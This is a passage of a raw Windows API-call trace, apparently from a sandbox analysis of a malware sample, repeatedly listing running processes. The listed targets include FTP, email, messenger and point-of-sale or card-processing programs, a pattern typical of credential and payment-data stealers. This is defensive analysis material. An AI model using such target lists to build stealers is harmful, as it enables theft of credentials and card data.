th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0253.801] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0253.803] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0253.808] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0253.811] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0253.813] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0253.819] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0253.821] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0253.824] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0253.827] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0253.830] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0253.832] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0253.835] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0253.837] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0253.840] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0253.843] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0253.845] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0253.848] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0253.850] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0253.857] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0253.859] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0253.862] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0253.865] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0253.868] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0253.870] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0253.873] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0253.876] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0253.878] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0253.881] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0253.884] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0253.886] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0253.889] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0253.897] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0253.900] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0253.902] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0253.905] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0253.909] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0253.912] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0253.914] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0253.917] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0253.919] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0253.921] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0253.922] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0253.924] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0253.926] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0253.928] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0253.930] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0253.931] CloseHandle (hObject=0x2060) returned 1 [0253.931] Sleep (dwMilliseconds=0x64) [0254.036] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0254.059] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.060] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0254.062] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0254.064] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.066] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0254.067] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.069] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0254.071] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0254.073] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0254.075] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.077] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.079] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0254.081] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.084] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.086] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.089] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.091] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.093] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.095] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.096] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0254.098] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0254.100] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.103] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0254.105] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.107] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0254.109] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0254.111] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0254.114] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0254.115] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0254.117] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0254.119] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.123] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0254.125] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0254.126] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0254.128] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.129] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0254.131] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0254.133] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, 